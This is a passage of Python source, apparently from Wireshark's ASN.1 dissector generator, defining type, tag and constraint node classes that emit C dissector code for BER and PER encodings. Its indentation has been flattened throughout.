# end of make_virtual_type()
if ectx.conform.omit_assignment('V', self.ident, ectx.Module()): return # Assignment to omit
self.module = ectx.Module()
ectx.eth_reg_oassign(self)
if (self.cls == 'TYPE-IDENTIFIER') or (self.cls == 'ABSTRACT-SYNTAX'):
make_virtual_type(self.cls, '&Type', 'TYPE')
if (self.cls == 'OPERATION'):
make_virtual_type(self.cls, '&ArgumentType', 'ARG')
make_virtual_type(self.cls, '&ResultType', 'RES')
if (self.cls == 'ERROR'):
make_virtual_type(self.cls, '&ParameterType', 'PAR')
#--- Type ---------------------------------------------------------------------
class Type (Node):
def __init__(self,*args, **kw) :
self.name = None
self.constr = None
self.tags = []
self.named_list = None
Node.__init__ (self,*args, **kw)
def IsNamed(self):
if self.name is None :
return False
else:
return True
def HasConstraint(self):
if self.constr is None :
return False
else :
return True
def HasSizeConstraint(self):
return self.HasConstraint() and self.constr.IsSize()
def HasValueConstraint(self):
return self.HasConstraint() and self.constr.IsValue()
def HasPermAlph(self):
return self.HasConstraint() and self.constr.IsPermAlph()
def HasContentsConstraint(self):
return self.HasConstraint() and self.constr.IsContents()
def HasOwnTag(self):
return len(self.tags) > 0
def HasImplicitTag(self, ectx):
return (self.HasOwnTag() and self.tags[0].IsImplicit(ectx))
def IndetermTag(self, ectx):
return False
def AddTag(self, tag):
self.tags[0:0] = [tag]
def GetTag(self, ectx):
#print "GetTag(%s)\n" % self.name;
if (self.HasOwnTag()):
return self.tags[0].GetTag(ectx)
else:
return self.GetTTag(ectx)
def GetTTag(self, ectx):
print("#Unhandled GetTTag() in %s" % (self.type))
print(self.str_depth(1))
return ('BER_CLASS_unknown', 'TAG_unknown')
def SetName(self, name):
self.name = name
def AddConstraint(self, constr):
if not self.HasConstraint():
self.constr = constr
else:
self.constr = Constraint(type = 'Intersection', subtype = [self.constr, constr])
def eth_tname(self):
return '#' + self.type + '_' + str(id(self))
def eth_ftype(self, ectx):
return ('FT_NONE', 'BASE_NONE')
def eth_strings(self):
return 'NULL'
def eth_omit_field(self):
return False
def eth_need_tree(self):
return False
def eth_has_vals(self):
return False
def eth_has_enum(self, tname, ectx):
return self.eth_has_vals() and (ectx.eth_type[tname]['enum'] & EF_ENUM)
def eth_need_pdu(self, ectx):
return None
def eth_named_bits(self):
return None
def eth_reg_sub(self, ident, ectx):
pass
def get_components(self, ectx):
print("#Unhandled get_components() in %s" % (self.type))
print(self.str_depth(1))
return []
def sel_req(self, sel, ectx):
print("#Selection '%s' required for non-CHOICE type %s" % (sel, self.type))
print(self.str_depth(1))
def fld_obj_eq(self, other):
return isinstance(other, Type) and (self.eth_tname() == other.eth_tname())
def eth_reg(self, ident, ectx, tstrip=0, tagflag=False, selflag=False, idx='', parent=None):
#print "eth_reg(): %s, ident=%s, tstrip=%d, tagflag=%s, selflag=%s, parent=%s" %(self.type, ident, tstrip, str(tagflag), str(selflag), str(parent))
#print " ", self
if (ectx.NeedTags() and (len(self.tags) > tstrip)):
tagged_type = self
for i in range(len(self.tags)-1, tstrip-1, -1):
tagged_type = TaggedType(val=tagged_type, tstrip=i)
tagged_type.AddTag(self.tags[i])
if not tagflag: # 1st tagged level
if self.IsNamed() and not selflag:
tagged_type.SetName(self.name)
tagged_type.eth_reg(ident, ectx, tstrip=1, tagflag=tagflag, idx=idx, parent=parent)
return
nm = ''
if ident and self.IsNamed() and not tagflag and not selflag:
nm = ident + '/' + self.name
elif ident:
nm = ident
elif self.IsNamed():
nm = self.name
if not ident and ectx.conform.omit_assignment('T', nm, ectx.Module()): return # Assignment to omit
if not ident: # Assignment
ectx.eth_reg_assign(nm, self)
if self.type == 'Type_Ref' and not self.tr_need_own_fn(ectx):
ectx.eth_reg_type(nm, self)
virtual_tr = Type_Ref(val=ectx.conform.use_item('SET_TYPE', nm))
if (self.type == 'Type_Ref') or ectx.conform.check_item('SET_TYPE', nm):
if ident and (ectx.conform.check_item('TYPE_RENAME', nm) or ectx.conform.get_fn_presence(nm) or selflag):
if ectx.conform.check_item('SET_TYPE', nm):
ectx.eth_reg_type(nm, virtual_tr) # dummy Type Reference
else:
ectx.eth_reg_type(nm, self) # new type
trnm = nm
elif ectx.conform.check_item('SET_TYPE', nm):
trnm = ectx.conform.use_item('SET_TYPE', nm)
elif (self.type == 'Type_Ref') and self.tr_need_own_fn(ectx):
ectx.eth_reg_type(nm, self) # need own function, e.g. for constraints
trnm = nm
else:
trnm = self.val
else:
ectx.eth_reg_type(nm, self)
trnm = nm
if ectx.conform.check_item('VIRTUAL_ASSGN', nm):
vnm = ectx.conform.use_item('VIRTUAL_ASSGN', nm)
ectx.eth_reg_assign(vnm, self, virt=True)
ectx.eth_reg_type(vnm, self)
self.eth_reg_sub(vnm, ectx)
if parent and (ectx.type[parent]['val'].type == 'TaggedType'):
ectx.type[parent]['val'].eth_set_val_name(parent, trnm, ectx)
if ident and not tagflag and not self.eth_omit_field():
ectx.eth_reg_field(nm, trnm, idx=idx, parent=parent, impl=self.HasImplicitTag(ectx))
if ectx.conform.check_item('SET_TYPE', nm):
virtual_tr.eth_reg_sub(nm, ectx)
else:
self.eth_reg_sub(nm, ectx)
def eth_get_size_constr(self, ectx):
(minv, maxv, ext) = ('MIN', 'MAX', False)
if self.HasSizeConstraint():
if self.constr.IsSize():
(minv, maxv, ext) = self.constr.GetSize(ectx)
if (self.constr.type == 'Intersection'):
if self.constr.subtype[0].IsSize():
(minv, maxv, ext) = self.constr.subtype[0].GetSize(ectx)
elif self.constr.subtype[1].IsSize():
(minv, maxv, ext) = self.constr.subtype[1].GetSize(ectx)
if minv == 'MIN': minv = 'NO_BOUND'
if maxv == 'MAX': maxv = 'NO_BOUND'
if (ext): ext = 'TRUE'
else: ext = 'FALSE'
return (minv, maxv, ext)
def eth_get_value_constr(self, ectx):
(minv, maxv, ext) = ('MIN', 'MAX', False)
if self.HasValueConstraint():
(minv, maxv, ext) = self.constr.GetValue(ectx)
if minv == 'MIN': minv = 'NO_BOUND'
if maxv == 'MAX': maxv = 'NO_BOUND'
if str(minv).isdigit():
minv += 'U'
elif (str(minv)[0] == "-") and str(minv)[1:].isdigit():
if (int(minv) == -(2**31)):
minv = "G_MININT32"
elif (int(minv) < -(2**31)):
minv = "G_GINT64_CONSTANT(%s)" % (str(minv))
if str(maxv).isdigit():
if (int(maxv) >= 2**32):
maxv = "G_GUINT64_CONSTANT(%s)" % (str(maxv))
else:
maxv += 'U'
if (ext): ext = 'TRUE'
else: ext = 'FALSE'
return (minv, maxv, ext)
def eth_get_alphabet_constr(self, ectx):
(alph, alphlen) = ('NULL', '0')
if self.HasPermAlph():
alph = self.constr.GetPermAlph(ectx)
if not alph:
alph = 'NULL'
if (alph != 'NULL'):
if (((alph[0] + alph[-1]) == '""') and (not alph.count('"', 1, -1))):
alphlen = str(len(alph) - 2)
else:
alphlen = 'strlen(%s)' % (alph)
return (alph, alphlen)
def eth_type_vals(self, tname, ectx):
if self.eth_has_vals():
print("#Unhandled eth_type_vals('%s') in %s" % (tname, self.type))
print(self.str_depth(1))
return ''
def eth_type_enum(self, tname, ectx):
if self.eth_has_enum(tname, ectx):
print("#Unhandled eth_type_enum('%s') in %s" % (tname, self.type))
print(self.str_depth(1))
return ''
def eth_type_default_table(self, ectx, tname):
return ''
def eth_type_default_body(self, ectx):
print("#Unhandled eth_type_default_body() in %s" % (self.type))
print(self.str_depth(1))
return ''
def eth_type_default_pars(self, ectx, tname):
pars = {
'TNAME' : tname,
'ER' : ectx.encp(),
'FN_VARIANT' : '',
'TREE' : 'tree',
'TVB' : 'tvb',
'OFFSET' : 'offset',
'ACTX' : 'actx',
'HF_INDEX' : 'hf_index',
'VAL_PTR' : 'NULL',
'IMPLICIT_TAG' : 'implicit_tag',
}
if (ectx.eth_type[tname]['tree']):
pars['ETT_INDEX'] = ectx.eth_type[tname]['tree']
if (ectx.merge_modules):
pars['PROTOP'] = ''
else:
pars['PROTOP'] = ectx.eth_type[tname]['proto'] + '_'
return pars
def eth_type_fn(self, proto, tname, ectx):
body = self.eth_type_default_body(ectx, tname)
pars = self.eth_type_default_pars(ectx, tname)
if ectx.conform.check_item('FN_PARS', tname):
pars.update(ectx.conform.use_item('FN_PARS', tname))
elif ectx.conform.check_item('FN_PARS', ectx.eth_type[tname]['ref'][0]):
pars.update(ectx.conform.use_item('FN_PARS', ectx.eth_type[tname]['ref'][0]))
pars['DEFAULT_BODY'] = body
for i in range(4):
for k in list(pars.keys()):
try:
pars[k] = pars[k] % pars
except (ValueError,TypeError):
raise sys.exc_info()[0]("%s\n%s" % (str(pars), sys.exc_info()[1]))
out = '\n'
out += self.eth_type_default_table(ectx, tname) % pars
out += ectx.eth_type_fn_hdr(tname)
out += ectx.eth_type_fn_body(tname, body, pars=pars)
out += ectx.eth_type_fn_ftr(tname)
return out
#--- Value --------------------------------------------------------------------
class Value (Node):
def __init__(self,*args, **kw) :
self.name = None
Node.__init__ (self,*args, **kw)
def SetName(self, name) :
self.name = name
def to_str(self, ectx):
return str(self.val)
def get_dep(self):
return None
def fld_obj_repr(self, ectx):
return self.to_str(ectx)
#--- Value_Ref -----------------------------------------------------------------
class Value_Ref (Value):
def to_str(self, ectx):
return asn2c(self.val)
#--- ObjectClass ---------------------------------------------------------------------
class ObjectClass (Node):
def __init__(self,*args, **kw) :
self.name = None
Node.__init__ (self,*args, **kw)
def SetName(self, name):
self.name = name
add_class_ident(self.name)
def eth_reg(self, ident, ectx):
if ectx.conform.omit_assignment('C', self.name, ectx.Module()): return # Assignment to omit
ectx.eth_reg_objectclass(self.name, self)
#--- Class_Ref -----------------------------------------------------------------
class Class_Ref (ObjectClass):
pass
#--- ObjectClassDefn ---------------------------------------------------------------------
class ObjectClassDefn (ObjectClass):
def reg_types(self):
for fld in self.fields:
repr = fld.fld_repr()
set_type_to_class(self.name, repr[0], repr[1:])
#--- Tag ---------------------------------------------------------------
class Tag (Node):
def to_python (self, ctx):
return 'asn1.TYPE(%s,%s)' % (mk_tag_str (ctx, self.tag.cls,
self.tag_typ,
self.tag.num),
self.typ.to_python (ctx))
def IsImplicit(self, ectx):
return ((self.mode == 'IMPLICIT') or ((self.mode == 'default') and (ectx.tag_def != 'EXPLICIT')))
def GetTag(self, ectx):
tc = ''
if (self.cls == 'UNIVERSAL'): tc = 'BER_CLASS_UNI'
elif (self.cls == 'APPLICATION'): tc = 'BER_CLASS_APP'
elif (self.cls == 'CONTEXT'): tc = 'BER_CLASS_CON'
elif (self.cls == 'PRIVATE'): tc = 'BER_CLASS_PRI'
return (tc, self.num)
def eth_tname(self):
n = ''
if (self.cls == 'UNIVERSAL'): n = 'U'
elif (self.cls == 'APPLICATION'): n = 'A'
elif (self.cls == 'CONTEXT'): n = 'C'
elif (self.cls == 'PRIVATE'): n = 'P'
return n + str(self.num)
#--- Constraint ---------------------------------------------------------------
constr_cnt = 0
class Constraint (Node):
def to_python (self, ctx):
print("Ignoring constraint:", self.type)
return self.subtype.typ.to_python (ctx)
def __str__ (self):
return "Constraint: type=%s, subtype=%s" % (self.type, self.subtype)
def eth_tname(self):
return '#' + self.type + '_' + str(id(self))
def IsSize(self):
return (self.type == 'Size' and self.subtype.IsValue()) \
or (self.type == 'Intersection' and (self.subtype[0].IsSize() or self.subtype[1].IsSize())) \
def GetSize(self, ectx):
(minv, maxv, ext) = ('MIN', 'MAX', False)
if self.IsSize():
if self.type == 'Size':
(minv, maxv, ext) = self.subtype.GetValue(ectx)
elif self.type == 'Intersection':
if self.subtype[0].IsSize() and not self.subtype[1].IsSize():
(minv, maxv, ext) = self.subtype[0].GetSize(ectx)
elif not self.subtype[0].IsSize() and self.subtype[1].IsSize():
(minv, maxv, ext) = self.subtype[1].GetSize(ectx)
return (minv, maxv, ext)
def IsValue(self):
return self.type == 'SingleValue' \
or self.type == 'ValueRange' \
or (self.type == 'Intersection' and (self.subtype[0].IsValue() or self.subtype[1].IsValue())) \
or (self.type == 'Union' and (self.subtype[0].IsValue() and self.subtype[1].IsValue()))
def GetValue(self, ectx):
(minv, maxv, ext) = ('MIN', 'MAX', False)
if self.IsValue():
if self.type == 'SingleValue':
minv = ectx.value_get_eth(self.subtype)
maxv = ectx.value_get_eth(self.subtype)
ext = hasattr(self, 'ext') and self.ext
elif self.type == 'ValueRange':
minv = ectx.value_get_eth(self.subtype[0])
maxv = ectx.value_get_eth(self.subtype[1])
ext = hasattr(self, 'ext') and self.ext
elif self.type == 'Intersection':
if self.subtype[0].IsValue() and not self.subtype[1].IsValue():
(minv, maxv, ext) = self.subtype[0].GetValue(ectx)
elif not self.subtype[0].IsValue() and self.subtype[1].IsValue():
(minv, maxv, ext) = self.subtype[1].GetValue(ectx)
elif self.subtype[0].IsValue() and self.subtype[1].IsValue():
v0 = self.subtype[0].GetValue(ectx)
v1 = self.subtype[1].GetValue(ectx)
(minv, maxv, ext) = (ectx.value_max(v0[0],v1[0]), ectx.value_min(v0[1],v1[1]), v0[2] and v1[2])
elif self.type == 'Union':
if self.subtype[0].IsValue() and self.subtype[1].IsValue():
v0 = self.subtype[0].GetValue(ectx)
v1 = self.subtype[1].GetValue(ectx)
(minv, maxv, ext) = (ectx.value_min(v0[0],v1[0]), ectx.value_max(v0[1],v1[1]), v0[2] or v1[2])
return (minv, maxv, ext)
def IsAlphabet(self):
return self.type == 'SingleValue' \
or self.type == 'ValueRange' \
or (self.type == 'Intersection' and (self.subtype[0].IsAlphabet() or self.subtype[1].IsAlphabet())) \
or (self.type == 'Union' and (self.subtype[0].IsAlphabet() and self.subtype[1].IsAlphabet()))
def GetAlphabet(self, ectx):
alph = None
if self.IsAlphabet():
if self.type == 'SingleValue':
alph = ectx.value_get_eth(self.subtype)
elif self.type == 'ValueRange':
if ((len(self.subtype[0]) == 3) and ((self.subtype[0][0] + self.subtype[0][-1]) == '""') \
and (len(self.subtype[1]) == 3) and ((self.subtype[1][0] + self.subtype[1][-1]) == '""')):
alph = '"'
for c in range(ord(self.subtype[0][1]), ord(self.subtype[1][1]) + 1):
alph += chr(c)
alph += '"'
elif self.type == 'Union':
if self.subtype[0].IsAlphabet() and self.subtype[1].IsAlphabet():
a0 = self.subtype[0].GetAlphabet(ectx)
a1 = self.subtype[1].GetAlphabet(ectx)
if (((a0[0] + a0[-1]) == '""') and not a0.count('"', 1, -1) \
and ((a1[0] + a1[-1]) == '""') and not a1.count('"', 1, -1)):
alph = '"' + a0[1:-1] + a1[1:-1] + '"'
else:
alph = a0 + ' ' + a1
return alph
def IsPermAlph(self):
return self.type == 'From' and self.subtype.IsAlphabet() \
or (self.type == 'Intersection' and (self.subtype[0].IsPermAlph() or self.subtype[1].IsPermAlph())) \
def GetPermAlph(self, ectx):
alph = None
if self.IsPermAlph():
if self.type == 'From':
alph = self.subtype.GetAlphabet(ectx)
elif self.type == 'Intersection':
if self.subtype[0].IsPermAlph() and not self.subtype[1].IsPermAlph():
alph = self.subtype[0].GetPermAlph(ectx)
elif not self.subtype[0].IsPermAlph() and self.subtype[1].IsPermAlph():
alph = self.subtype[1].GetPermAlph(ectx)
return alph
def IsContents(self):
return self.type == 'Contents' \
or (self.type == 'Intersection' and (self.subtype[0].IsContents() or self.subtype[1].IsContents())) \
def GetContents(self, ectx):
contents = None
if self.IsContents():
if self.type == 'Contents':
if self.subtype.type == 'Type_Ref':
contents = self.subtype.val
elif self.type == 'Intersection':
if self.subtype[0].IsContents() and not self.subtype[1].IsContents():
contents = self.subtype[0].GetContents(ectx)
elif not self.subtype[0].IsContents() and self.subtype[1].IsContents():
contents = self.subtype[1].GetContents(ectx)
return contents
def IsNegativ(self):
def is_neg(sval):
return isinstance(sval, str) and (sval[0] == '-')
if self.type == 'SingleValue':
return is_neg(self.subtype)
elif self.type == 'ValueRange':
if self.subtype[0] == 'MIN': return True
return is_neg(self.subtype[0])
return False
def eth_constrname(self):
def int2str(val):
if isinstance(val, Value_Ref):
return asn2c(val.val)
try:
if (int(val) < 0):
return 'M' + str(-int(val))
else:
return str(int(val))
except (ValueError, TypeError):
return asn2c(str(val))
ext = ''
if hasattr(self, 'ext') and self.ext:
ext = '_'
if self.type == 'SingleValue':
return int2str(self.subtype) + ext
elif self.type == 'ValueRange':
return int2str(self.subtype[0]) + '_' + int2str(self.subtype[1]) + ext
elif self.type == 'Size':
return 'SIZE_' + self.subtype.eth_constrname() + ext
else:
if (not hasattr(self, 'constr_num')):
global constr_cnt
constr_cnt += 1
self.constr_num = constr_cnt
return 'CONSTR%03d%s' % (self.constr_num, ext)
def Needs64b(self, ectx):
(minv, maxv, ext) = self.GetValue(ectx)
if (str(minv).isdigit() or ((str(minv)[0] == "-") and str(minv)[1:].isdigit())) \
and str(maxv).isdigit() and (abs(int(maxv) - int(minv)) >= 2**32):
return True
return False
class Module (Node):
def to_python (self, ctx):
ctx.tag_def = self.tag_def.dfl_tag
return """#%s
%s""" % (self.ident, self.body.to_python (ctx))
def get_name(self):
return self.ident.val
def get_proto(self, ectx):
if (ectx.proto):
prot = ectx.proto
else:
prot = ectx.conform.use_item('MODULE', self.get_name(), val_dflt=self.get_name())
return prot
def to_eth(self, ectx):
ectx.tags_def = 'EXPLICIT' # default = explicit
ectx.proto = self.get_proto(ectx)
ectx.tag_def = self.tag_def.dfl_tag
ectx.eth_reg_module(self)
self.body.to_eth(ectx)
class Module_Body (Node):
def to_python (self, ctx):
# XXX handle exports, imports.
l = [x.to_python (ctx) for x in self.assign_list]
l = [a for a in l if a != '']
return "\n".join (l)
def to_eth(self, ectx):
# Exports
ectx.eth_exports(self.exports)
# Imports
for i in self.imports:
mod = i.module.val
proto = ectx.conform.use_item('MODULE', mod, val_dflt=mod)
ectx.eth_module_dep_add(ectx.Module(), mod)
for s in i.symbol_list:
if isinstance(s, Type_Ref):
ectx.eth_import_type(s.val, mod, proto)
elif isinstance(s, Value_Ref):
ectx.eth_import_value(s.val, mod, proto)
elif isinstance(s, Class_Ref):
ectx.eth_import_class(s.val, mod, proto)
else:
msg = 'Unknown kind of imported symbol %s from %s' % (str(s), mod)
warnings.warn_explicit(msg, UserWarning, '', 0)
# AssignmentList
for a in self.assign_list:
a.eth_reg('', ectx)
class Default_Tags (Node):
def to_python (self, ctx): # not to be used directly
assert (0)
# XXX should just calculate dependencies as we go along.
def calc_dependencies (node, dict, trace = 0):
if not hasattr (node, '__dict__'):
if trace: print("#returning, node=", node)
return
if isinstance (node, Type_Ref):
dict [node.val] = 1
if trace: print("#Setting", node.val)
return
for (a, val) in list(node.__dict__.items ()):
if trace: print("# Testing node ", node, "attr", a, " val", val)
if a[0] == '_':
continue
elif isinstance (val, Node):
calc_dependencies (val, dict, trace)
elif isinstance (val, type ([])):
for v in val:
calc_dependencies (v, dict, trace)
class Type_Assign (Node):
def __init__ (self, *args, **kw):
Node.__init__ (self, *args, **kw)
if isinstance (self.val, Tag): # XXX replace with generalized get_typ_ignoring_tag (no-op for Node, override in Tag)
to_test = self.val.typ
else:
to_test = self.val
if isinstance (to_test, SequenceType):
to_test.sequence_name = self.name.name
def to_python (self, ctx):
dep_dict = {}
calc_dependencies (self.val, dep_dict, 0)
depend_list = list(dep_dict.keys ())
return ctx.register_assignment (self.name.name,
self.val.to_python (ctx),
depend_list)
class PyQuote (Node):
def to_python (self, ctx):
return ctx.register_pyquote (self.val)
#--- Type_Ref -----------------------------------------------------------------
class Type_Ref (Type):
def to_python (self, ctx):
return self.val
def eth_reg_sub(self, ident, ectx):
ectx.eth_dep_add(ident, self.val)
def eth_tname(self):
if self.HasSizeConstraint():
return asn2c(self.val) + '_' + self.constr.eth_constrname()
else:
return asn2c(self.val)
def tr_need_own_fn(self, ectx):
return ectx.Per() and self.HasSizeConstraint()
def fld_obj_repr(self, ectx):
return self.val
def get_components(self, ectx):
if self.val not in ectx.type or ectx.type[self.val]['import']:
msg = "Can not get COMPONENTS OF %s which is imported type" % (self.val)
warnings.warn_explicit(msg, UserWarning, '', 0)
return []
else:
return ectx.type[self.val]['val'].get_components(ectx)
def GetTTag(self, ectx):
#print "GetTTag(%s)\n" % self.val;
if (ectx.type[self.val]['import']):
if 'ttag' not in ectx.type[self.val]:
ttag = ectx.get_ttag_from_all(self.val, ectx.type[self.val]['import'])
if not ttag and not ectx.conform.check_item('IMPORT_TAG', self.val):
msg = 'Missing tag information for imported type %s from %s (%s)' % (self.val, ectx.type[self.val]['import'], ectx.type[self.val]['proto'])
warnings.warn_explicit(msg, UserWarning, '', 0)
ttag = ('-1/*imported*/', '-1/*imported*/')
ectx.type[self.val]['ttag'] = ectx.conform.use_item('IMPORT_TAG', self.val, val_dflt=ttag)
return ectx.type[self.val]['ttag']
else:
return ectx.type[self.val]['val'].GetTag(ectx)
def IndetermTag(self, ectx):
if (ectx.type[self.val]['import']):
return False
else:
return ectx.type[self.val]['val'].IndetermTag(ectx)
def eth_type_default_pars(self, ectx, tname):
if tname:
pars = Type.eth_type_default_pars(self, ectx, tname)
else:
pars = {}
t = ectx.type[self.val]['ethname']
pars['TYPE_REF_PROTO'] = ectx.eth_type[t]['proto']
pars['TYPE_REF_TNAME'] = t
pars['TYPE_REF_FN'] = 'dissect_%(TYPE_REF_PROTO)s_%(TYPE_REF_TNAME)s'
if self.HasSizeConstraint():
(pars['MIN_VAL'], pars['MAX_VAL'], pars['EXT']) = self.eth_get_size_constr(ectx)
return pars
def eth_type_default_body(self, ectx, tname):
if (ectx.Ber()):
body = ectx.eth_fn_call('%(TYPE_REF_FN)s', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s'),))
elif (ectx.Per()):
if self.HasSizeConstraint():
body = ectx.eth_fn_call('dissect_%(ER)s_size_constrained_type', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s', '%(TYPE_REF_FN)s',),
('"%(TYPE_REF_TNAME)s"', '%(MIN_VAL)s', '%(MAX_VAL)s', '%(EXT)s',),))
else:
body = ectx.eth_fn_call('%(TYPE_REF_FN)s', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s'),))
else:
body = '#error Can not decode %s' % (tname)
return body
#--- SelectionType ------------------------------------------------------------
class SelectionType (Type):
def to_python (self, ctx):
return self.val
def sel_of_typeref(self):
return self.typ.type == 'Type_Ref'
def eth_reg_sub(self, ident, ectx):
if not self.sel_of_typeref():
self.seltype = ''
return
self.seltype = ectx.eth_sel_req(self.typ.val, self.sel)
ectx.eth_dep_add(ident, self.seltype)
def eth_ftype(self, ectx):
(ftype, display) = ('FT_NONE', 'BASE_NONE')
if self.sel_of_typeref() and not ectx.type[self.seltype]['import']:
(ftype, display) = ectx.type[self.typ.val]['val'].eth_ftype_sel(self.sel, ectx)
return (ftype, display)
def GetTTag(self, ectx):
#print "GetTTag(%s)\n" % self.seltype;
if (ectx.type[self.seltype]['import']):
if 'ttag' not in ectx.type[self.seltype]:
if not ectx.conform.check_item('IMPORT_TAG', self.seltype):
msg = 'Missing tag information for imported type %s from %s (%s)' % (self.seltype, ectx.type[self.seltype]['import'], ectx.type[self.seltype]['proto'])
warnings.warn_explicit(msg, UserWarning, '', 0)
ectx.type[self.seltype]['ttag'] = ectx.conform.use_item('IMPORT_TAG', self.seltype, val_dflt=('-1 /*imported*/', '-1 /*imported*/'))
return ectx.type[self.seltype]['ttag']
else:
return ectx.type[self.typ.val]['val'].GetTTagSel(self.sel, ectx)
def eth_type_default_pars(self, ectx, tname):
pars = Type.eth_type_default_pars(self, ectx, tname)
if self.sel_of_typeref():
t = ectx.type[self.seltype]['ethname']
pars['TYPE_REF_PROTO'] = ectx.eth_type[t]['proto']
pars['TYPE_REF_TNAME'] = t
pars['TYPE_REF_FN'] = 'dissect_%(TYPE_REF_PROTO)s_%(TYPE_REF_TNAME)s'
return pars
def eth_type_default_body(self, ectx, tname):
if not self.sel_of_typeref():
body = '#error Can not decode %s' % (tname)
elif (ectx.Ber()):
body = ectx.eth_fn_call('%(TYPE_REF_FN)s', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s'),))
elif (ectx.Per()):
body = ectx.eth_fn_call('%(TYPE_REF_FN)s', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s'),))
else:
body = '#error Can not decode %s' % (tname)
return body
#--- TaggedType -----------------------------------------------------------------
class TaggedType (Type):
def eth_tname(self):
tn = ''
for i in range(self.tstrip, len(self.val.tags)):
tn += self.val.tags[i].eth_tname()
tn += '_'
tn += self.val.eth_tname()
return tn
def eth_set_val_name(self, ident, val_name, ectx):
#print "TaggedType::eth_set_val_name(): ident=%s, val_name=%s" % (ident, val_name)
self.val_name = val_name
ectx.eth_dep_add(ident, self.val_name)
def eth_reg_sub(self, ident, ectx):
self.val_name = ident + '/' + UNTAG_TYPE_NAME
self.val.eth_reg(self.val_name, ectx, tstrip=self.tstrip+1, tagflag=True, parent=ident)
def GetTTag(self, ectx):
#print "GetTTag(%s)\n" % self.seltype;
return self.GetTag(ectx)
def eth_ftype(self, ectx):
return self.val.eth_ftype(ectx)
def eth_type_default_pars(self, ectx, tname):
pars = Type.eth_type_default_pars(self, ectx, tname)
t = ectx.type[self.val_name]['ethname']
pars['TYPE_REF_PROTO'] = ectx.eth_type[t]['proto']
pars['TYPE_REF_TNAME'] = t
pars['TYPE_REF_FN'] = 'dissect_%(TYPE_REF_PROTO)s_%(TYPE_REF_TNAME)s'
(pars['TAG_CLS'], pars['TAG_TAG']) = self.GetTag(ectx)
if self.HasImplicitTag(ectx):
pars['TAG_IMPL'] = 'TRUE'
else:
pars['TAG_IMPL'] = 'FALSE'
return pars
def eth_type_default_body(self, ectx, tname):
if (ectx.Ber()):
body = ectx.eth_fn_call('dissect_%(ER)s_tagged_type', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(ACTX)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s'),
('%(HF_INDEX)s', '%(TAG_CLS)s', '%(TAG_TAG)s', '%(TAG_IMPL)s', '%(TYPE_REF_FN)s',),))
else:
body = '#error Can not decode %s' % (tname)
return body
#--- SqType -----------------------------------------------------------
class SqType (Type):
def out_item(self, f, val, optional, ext, ectx):
if (val.eth_omit_field()):
t = ectx.type[val.ident]['ethname']
fullname = ectx.dummy_eag_field
else:
ef = ectx.field[f]['ethname']
t = ectx.eth_hf[ef]['ethtype']
fullname = ectx.eth_hf[ef]['fullname']
if (ectx.Ber()):
#print "optional=%s, e.val.HasOwnTag()=%s, e.val.IndetermTag()=%s" % (str(e.optional), str(e.val.HasOwnTag()), str(e.val.IndetermTag(ectx)))
#print val.str_depth(1)
opt = ''
if (optional):
opt = 'BER_FLAGS_OPTIONAL'
if (not val.HasOwnTag()):
if (opt): opt += '|'
opt += 'BER_FLAGS_NOOWNTAG'
elif (val.HasImplicitTag(ectx)):
if (opt): opt += '|'
opt += 'BER_FLAGS_IMPLTAG'
if (val.IndetermTag(ectx)):
if (opt): opt += '|'
opt += 'BER_FLAGS_NOTCHKTAG'
if (not opt): opt = '0'
else:
if optional:
opt = 'ASN1_OPTIONAL'
else:
opt = 'ASN1_NOT_OPTIONAL'
if (ectx.Ber()):
(tc, tn) = val.GetTag(ectx)
out = ' { %-24s, %-13s, %s, %s, dissect_%s_%s },\n' \
% ('&'+fullname, tc, tn, opt, ectx.eth_type[t]['proto'], t)
elif (ectx.Per()):
out = ' { %-24s, %-23s, %-17s, dissect_%s_%s },\n' \
% ('&'+fullname, ext, opt, ectx.eth_type[t]['proto'], t)
else:
out = ''
return out
#--- SeqType -----------------------------------------------------------
class SeqType (SqType):
def all_components(self):
lst = self.elt_list[:]
if hasattr(self, 'ext_list'):
lst.extend(self.ext_list)
if hasattr(self, 'elt_list2'):
lst.extend(self.elt_list2)
return lst
def need_components(self):
lst = self.all_components()
for e in (lst):
if e.type == 'components_of':
return True
return False
def expand_components(self, ectx):
while self.need_components():
for i in range(len(self.elt_list)):
if self.elt_list[i].type == 'components_of':
comp = self.elt_list[i].typ.get_components(ectx)
self.elt_list[i:i+1] = comp
break
if hasattr(self, 'ext_list'):
for i in range(len(self.ext_list)):
if self.ext_list[i].type == 'components_of':
comp = self.ext_list[i].typ.get_components(ectx)
self.ext_list[i:i+1] = comp
break
if hasattr(self, 'elt_list2'):
for i in range(len(self.elt_list2)):
if self.elt_list2[i].type == 'components_of':
comp = self.elt_list2[i].typ.get_components(ectx)
self.elt_list2[i:i+1] = comp
break
def get_components(self, ectx):
lst = self.elt_list[:]
if hasattr(self, 'elt_list2'):
lst.extend(self.elt_list2)
return lst
def eth_reg_sub(self, ident, ectx, components_available=False):
# check if autotag is required
autotag = False
if (ectx.NeedTags() and (ectx.tag_def == 'AUTOMATIC')):
autotag = True
lst = self.all_components()
for e in (self.elt_list):
if e.val.HasOwnTag(): autotag = False; break;
# expand COMPONENTS OF
if self.need_components():
if components_available:
self.expand_components(ectx)
else:
ectx.eth_comp_req(ident)
return
# extension addition groups
if hasattr(self, 'ext_list'):
if (ectx.Per()): # add names
eag_num = 1
for e in (self.ext_list):
if isinstance(e.val, ExtensionAdditionGroup):
e.val.parent_ident = ident
e.val.parent_tname = ectx.type[ident]['tname']
if (e.val.ver):
e.val.SetName("eag_v%s" % (e.val.ver))
else:
e.val.SetName("eag_%d" % (eag_num))
eag_num += 1;
else: # expand
new_ext_list = []
for e in (self.ext_list):
if isinstance(e.val, ExtensionAdditionGroup):
new_ext_list.extend(e.val.elt_list)
else:
new_ext_list.append(e)
self.ext_list = new_ext_list
# do autotag
if autotag:
atag = 0
for e in (self.elt_list):
